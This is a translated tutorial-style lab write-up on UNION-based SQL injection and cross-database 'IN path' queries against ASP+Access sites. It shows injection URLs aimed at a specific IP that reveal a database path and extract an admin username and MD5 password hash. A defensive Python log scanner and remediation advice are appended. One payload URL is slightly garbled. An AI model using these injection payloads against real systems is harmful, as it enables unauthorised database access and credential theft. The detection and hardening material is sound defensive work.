Cross-database query of mdb files in Access

Source: Internet
Author: User

You probably still remember cross-database queries in MSSQL. In fact, Access can also run a query across two databases. Below I introduce cross-database queries in Access.

First, let's see how Access queries an mdb file. We can create an empty database and use it to query the admin table in the database D:\daos\db\daidalos.mdb. The SQL statement is:

SELECT * FROM admin IN "D:\daos\db\daidalos.mdb"





After the query runs, the contents of the admin table in the target database are returned:





In a real ASP injection, two SELECT statements have to be combined in a single request. Anyone familiar with PHP + MySQL injection will think of a UNION query, and UNION works in Access as well. Another advantage of a UNION query is that you do not have to guess the data one character at a time; the contents of a field can be exposed directly, just as in MySQL + PHP injection (mix has already written a detailed article on the specifics). Carrying out a cross-database query as shown above requires the following two conditions:

1. To use a UNION query, you must know the number of fields selected by the preceding SELECT statement.

2. You must know the location of the target database as an absolute path.

Condition 1 can be guessed manually from the error messages, or the guessing can be automated.

Condition 2 is harder, but it can be met with the Access "brute-force library" technique. Some people will say that if we know where the database is, we could simply download it directly. In practice, databases today are generally protected against download, and some are not in the web directory at all.

The first level of the fourth round of the anti-DDoS pro lab consists of two ASP + Access download systems: one is the Rain Point download system and the other is the Stolen Handsome download system. In testing, the Stolen Handsome system exposes its database path but does not allow the database to be downloaded, and it appears to have no injection point. The Rain Point system is full of holes: its database path can be exposed, the database can be downloaded directly, and injection is possible. However, the Rain Point back end is very simple and offers nothing useful, so our goal is the back-end password of the Stolen Handsome system. Below I demonstrate using the injection point in the Rain Point system for a cross-database query that obtains the Stolen Handsome back-end password:

We know that list.asp in the Rain Point system is injectable. First we need the number of fields for the UNION, so we submit:

http://219.237.81.46/yddown/list.asp?id=75%20union%20select%201%20from%20userinfo

The response:

Microsoft JET Database Engine error '80040e14'

The number of columns in the two selected tables or queries of a union query do not match.

/yddown/list.asp, line 51

The field count is wrong. I wrote a Perl script to guess the number of fields automatically (see the code below).

When we submit:

http://219.237.81.46/yddown/list.asp?id=75%20union%20select% 3%, 20 from%20userinfo

No error returned:





Haha! We now have the number of fields, and the page shows that position 1 is where the result of our query is displayed.

Now we still need the database location of the Stolen Handsome system. We simply submit the following:

http://219.237.81.46/dsdown%5cregs.asp

The path is returned successfully:

Microsoft JET Database Engine error '20140901'

'D:\111\db\kljdsld.asa' is not a valid path. Make sure that the path name is spelled correctly and that you are connected to the server on which the file resides.

/dsdown/db/user.asp, line 6

(Note: the path obtained this way is not necessarily complete. The actual path is D:\111\dsdown\db\kljdsld.asa)

Next we construct the cross-database URL as follows:

http://219.237.81.46/yddown/list.asp?id=75%20union%20select%20admin,3,2%20from%20admin%20in%20"D:\111\dsdown\db\kljdsld.asa"%20where%20id=1

The statement above uses a UNION query to pull data from D:\111\db\kljdsld.asa:





The username is admin. Next the password is exposed in the same way:

http://219.237.81.46/yddown/list.asp?id=75%20union%20select%20pws,3,2%20from%20admin%20in%20"D:\111\dsdown\db\kljdsld.asa"%20where%20id=1





We get a 32-character MD5 hash: 77e6cbb3f9468eadb655ae6826357922. The query succeeded. Here I only want to demonstrate the cross-database query :).

Summary

This article introduces two very useful techniques. First, in ASP injection we do not have to guess the data character by character, which is especially troublesome when it contains Chinese characters; using UNION exposes the data directly in one step, whether it contains Chinese characters or special characters. Second, the cross-database query is very flexible to use and can bring unexpected gains during a penetration test.
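
Seen from the defending side, each request in this walkthrough leaves a recognizable trace in the web server log: the UNION SELECT probes, the IN "drive:\path" external-database clause, and the %5c in the URL path that provokes the path-revealing JET error. The following Python log scanner is an added example, not part of the original article; the six-field log layout, the rule names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed log lines (not from the article):
# date time method uri-stem uri-query status
SAMPLE_LOG = """\
2024-01-10 10:00:01 GET /shop/list.asp id=75 200
2024-01-10 10:00:05 GET /shop/list.asp id=75%20union%20select%201%20from%20userinfo 500
2024-01-10 10:00:09 GET /shop/list.asp id=75%20union%20select%201,2,3%20from%20userinfo 200
2024-01-10 10:00:20 GET /other%5cregs.asp - 500
2024-01-10 10:00:31 GET /shop/list.asp id=75%20union%20select%20a,3,2%20from%20admin%20in%20%22E:%5Cx%5Cdb%5Csite.asa%22%20where%20id=1 200
2024-01-10 10:01:00 GET /shop/search.asp q=trade+union+news 200
"""

RULES = {
    # A second SELECT appended to the application's own query.
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I),
    # Access/JET external database clause: FROM t IN "C:\path\file"
    # (also matches a UNC path such as "\\host\share\file").
    "external_db_in_clause": re.compile(
        r"\bin\s+[\"']\s*(?:[a-z]:|\\\\)[^\"']*[\"']", re.I),
}
# Encoded backslash in the URL path, as used to provoke the path error.
ENCODED_BACKSLASH = re.compile(r"%5c", re.I)


def scan_line(line):
    """Return the sorted names of the rules a single log line triggers."""
    parts = line.split()
    if len(parts) < 6:
        return []  # not in the assumed six-field layout
    stem, query = parts[3], parts[4]
    decoded = unquote_plus(query) if query != "-" else ""
    hits = [name for name, rx in RULES.items() if rx.search(decoded)]
    if ENCODED_BACKSLASH.search(stem):
        hits.append("encoded_backslash_in_path")
    return sorted(hits)


def scan(log_text):
    """Map 1-based line number -> triggered rules, for lines with a hit."""
    findings = {}
    for number, line in enumerate(log_text.splitlines(), 1):
        hits = scan_line(line)
        if hits:
            findings[number] = hits
    return findings


if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG).items():
        print(number, ", ".join(hits))
```

Matches are triage signals only. On the application side, the numeric id parameter should be converted to an integer or bound as a query parameter, and detailed error pages should be disabled so that JET file paths are never returned to the client.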
